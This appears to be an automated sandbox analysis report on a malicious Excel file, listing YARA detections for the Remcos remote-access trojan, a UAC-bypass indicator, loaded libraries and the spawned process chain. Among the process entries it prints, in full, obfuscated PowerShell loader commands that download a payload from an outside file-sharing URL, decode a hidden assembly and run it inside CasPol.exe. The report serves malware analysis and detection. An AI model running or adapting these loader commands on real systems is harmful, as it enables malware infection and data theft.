                  Source: C:\Windows\System32\mshta.exe, Process created: Commandline size = 2073
                  Source: C:\Windows\System32\wscript.exe, Process created: Commandline size = 2446
                  Source: 35.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 35.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 35.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 35.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 35.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 35.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 00000023.00000002.542292669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 00000023.00000002.542292669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 00000023.00000002.542292669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: Process Memory Space: powershell.exe PID: 2116, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: Process Memory Space: powershell.exe PID: 3964, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: Process Memory Space: CasPol.exe PID: 3784, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: bhvD598.tmp.30.dr, Binary or memory string: org.slneighbors
                  Source: classification engine, Classification label: mal100.rans.phis.troj.spyw.expl.evad.winXLS@45/43@16/5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, Code function: 30_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, Code function: 33_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, Code function: 35_2_00416AB7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, Code function: 30_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, Code function: 30_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,CloseHandle,free,Process32NextW,CloseHandle
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, Code function: 30_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, Code function: 35_2_00419BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File created: C:\Users\user\AppData\Roaming\creatgoodideaforfuturebusinessdevelopwithnicethin.vBs
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Mutant created: NULL
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, Mutant created: \Sessions\1\BaseNamedObjects\Rmc-H42H13
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File created: C:\Users\user\AppData\Local\Temp\CVR84E7.tmp
                  Source: OC25-11-24.xls, OLE indicator, Workbook stream: true
                  Source: ~DF5ADC8DB78B38F887.TMP.0.dr, OLE indicator, Workbook stream: true
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatgoodideaforfuturebusinessdevelopwithnicethin.vBs"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, System information queried: HandleInformation
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File read: C:\Users\desktop.ini
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
                  Source: C:\Windows\System32\mshta.exe, File read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, File read: C:\Windows\System32\drivers\etc\hosts
                  Source: CasPol.exe, CasPol.exe, 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                  Source: CasPol.exe, CasPol.exe, 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                  Source: CasPol.exe, 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                  Source: CasPol.exe, CasPol.exe, 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                  Source: CasPol.exe, CasPol.exe, 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                  Source: CasPol.exe, CasPol.exe, 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                  Source: CasPol.exe, CasPol.exe, 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                  Source: OC25-11-24.xls, ReversingLabs: Detection: 15%
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, Evasive API call chain: __getmainargs,DecisionNodes,exitgraph_31-33246
                  Source: unknown, Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYSTeM32\WinDowSPOWeRSHelL\V1.0\PoWersHell.Exe" "pOWerSHeLL.EXe -Ex BypasS -noP -W 1 -c dEVICecREDEntIAlDEplOymENT.exE ; iEx($(Iex('[sYsTEm.TEXt.ENCodinG]'+[ChAr]0X3A+[Char]0x3A+'uTf8.GetSTRiNg([SYSTeM.ConveRt]'+[CHAr]0x3a+[ChAR]0X3A+'FROMBASE64StRING('+[cHaR]0x22+'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'+[ChAR]0x22+'))')))"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BypasS -noP -W 1 -c dEVICecREDEntIAlDEplOymENT.exE
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b53lag2c\b53lag2c.cmdline"
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3100.tmp" "c:\Users\user\AppData\Local\Temp\b53lag2c\CSCFF6E95784C84671B5586A4811C47.TMP"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatgoodideaforfuturebusinessdevelopwithnicethin.vBs"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('nErimageUrl = ZM5https://3105.filemail.com/api/file/get?fil'+'ekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ9'+'5-'+'dviTK5cARaNdQ'+'jbb3mexfwQzKmTXg'+'&skipreg=true&pk_vid'+'=e0109638c9bfb9571732531309b5ff7c Z'+'M5;nErwe'+'bClient = New-Object System.Net.WebC'+'lient;nErimageBytes = nErwebClient.DownloadData('+'nErimageUrl);nErimageText = ['+'System.Text.Encoding]::UTF8.GetStr'+'ing(nErimageBy'+'tes);nErstartFlag ='+' ZM5<<BASE64_START>>ZM5'+';nErendFlag = ZM5<<BASE64_'+'END>>ZM5;nErstartIndex = nErimageTex'+'t.IndexOf(nErstartFlag);nErendInd'+'ex = nErimageText.IndexOf('+'nErendFlag);nE'+'rstartIn'+'dex -ge 0 -and nErendIndex -gt nErstartIndex;nErstartIndex += nErstartFlag.Length;nErbase64'+'L'+'ength = nErendInde'+'x - nErsta'+'rtIndex;nErbase64Command = nErimageText.Substring(nErstartIndex, nErbase64Length'+');nErbase64Reversed = -join (nErba'+'se64Command.ToCharArray() JI6 ForEach'+'-Object { nEr_ })[-1..-(nErbase64Command.Length)];nErcommandBytes = [System.Convert]::'+'FromBas'+'e64String(nErbase64Reversed);nErloadedAssembly = [System.Reflection.Assembly]::Load(nErcommandBytes);nErvaiMethod = [dnlib.IO.Home].GetMethod'+'(ZM5VAIZM5);nErvaiMethod.Invoke(nErnull, @(ZM5txt.RSRVRS/'+'4421/531.5'+'02.432.271//:ptthZM5, ZM5'+'desativadoZM5, ZM5desativadoZM5, ZM5desativadoZM'+'5, ZM5CasPolZM5, ZM5desativadoZM5, ZM5desativadoZM5,ZM5desativadoZM5,Z'+'M5desativadoZ'+'M5,ZM5desativado'+'ZM'+'5,ZM5desativadoZM5,ZM5desativad'+'oZM5'+',ZM51ZM5,ZM5desativadoZM5));') -RePlacE ([char]110+[char]69+[char]114),[char]36-CReplAcE 'ZM5',[char]39 -RePlacE([char]74+[char]73+[char]54),[char]124)|& ( $pSHOME[4]+$PShOME[30]+'x')"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ovqlooon\ovqlooon.cmdline"
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES77DF.tmp" "c:\Users\user\AppData\Local\Temp\ovqlooon\CSCADDA0BE83C5E4E17A4EF3CEA725DA.TMP"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatgoodideaforfuturebusinessdevelopwithnicethin.vBs"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('nErimageUrl = ZM5https://3105.filemail.com/api/file/get?fil'+'ekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ9'+'5-'+'dviTK5cARaNdQ'+'jbb3mexfwQzKmTXg'+'&skipreg=true&pk_vid'+'=e0109638c9bfb9571732531309b5ff7c Z'+'M5;nErwe'+'bClient = New-Object System.Net.WebC'+'lient;nErimageBytes = nErwebClient.DownloadData('+'nErimageUrl);nErimageText = ['+'System.Text.Encoding]::UTF8.GetStr'+'ing(nErimageBy'+'tes);nErstartFlag ='+' ZM5<<BASE64_START>>ZM5'+';nErendFlag = ZM5<<BASE64_'+'END>>ZM5;nErstartIndex = nErimageTex'+'t.IndexOf(nErstartFlag);nErendInd'+'ex = nErimageText.IndexOf('+'nErendFlag);nE'+'rstartIn'+'dex -ge 0 -and nErendIndex -gt nErstartIndex;nErstartIndex += nErstartFlag.Length;nErbase64'+'L'+'ength = nErendInde'+'x - nErsta'+'rtIndex;nErbase64Command = nErimageText.Substring(nErstartIndex, nErbase64Length'+');nErbase64Reversed = -join (nErba'+'se64Command.ToCharArray() JI6 ForEach'+'-Object { nEr_ })[-1..-(nErbase64Command.Length)];nErcommandBytes = [System.Convert]::'+'FromBas'+'e64String(nErbase64Reversed);nErloadedAssembly = [System.Reflection.Assembly]::Load(nErcommandBytes);nErvaiMethod = [dnlib.IO.Home].GetMethod'+'(ZM5VAIZM5);nErvaiMethod.Invoke(nErnull, @(ZM5txt.RSRVRS/'+'4421/531.5'+'02.432.271//:ptthZM5, ZM5'+'desativadoZM5, ZM5desativadoZM5, ZM5desativadoZM'+'5, ZM5CasPolZM5, ZM5desativadoZM5, ZM5desativadoZM5,ZM5desativadoZM5,Z'+'M5desativadoZ'+'M5,ZM5desativado'+'ZM'+'5,ZM5desativadoZM5,ZM5desativad'+'oZM5'+',ZM51ZM5,ZM5desativadoZM5));') -RePlacE ([char]110+[char]69+[char]114),[char]36-CReplAcE 'ZM5',[char]39 -RePlacE([char]74+[char]73+[char]54),[char]124)|& ( $pSHOME[4]+$PShOME[30]+'x')"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\celvhtcxiwczckrdjzxnvyxm"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\eyqfiluzweuemqnhakkgfkrdatg"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\oavyjefskmmjowblkvxiixmujzxyrr"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b53lag2c\b53lag2c.cmdline"
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3100.tmp" "c:\Users\user\AppData\Local\Temp\b53lag2c\CSCFF6E95784C84671B5586A4811C47.TMP"
                  Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: nlaapi.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: oleacc.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: credssp.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: bcrypt.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
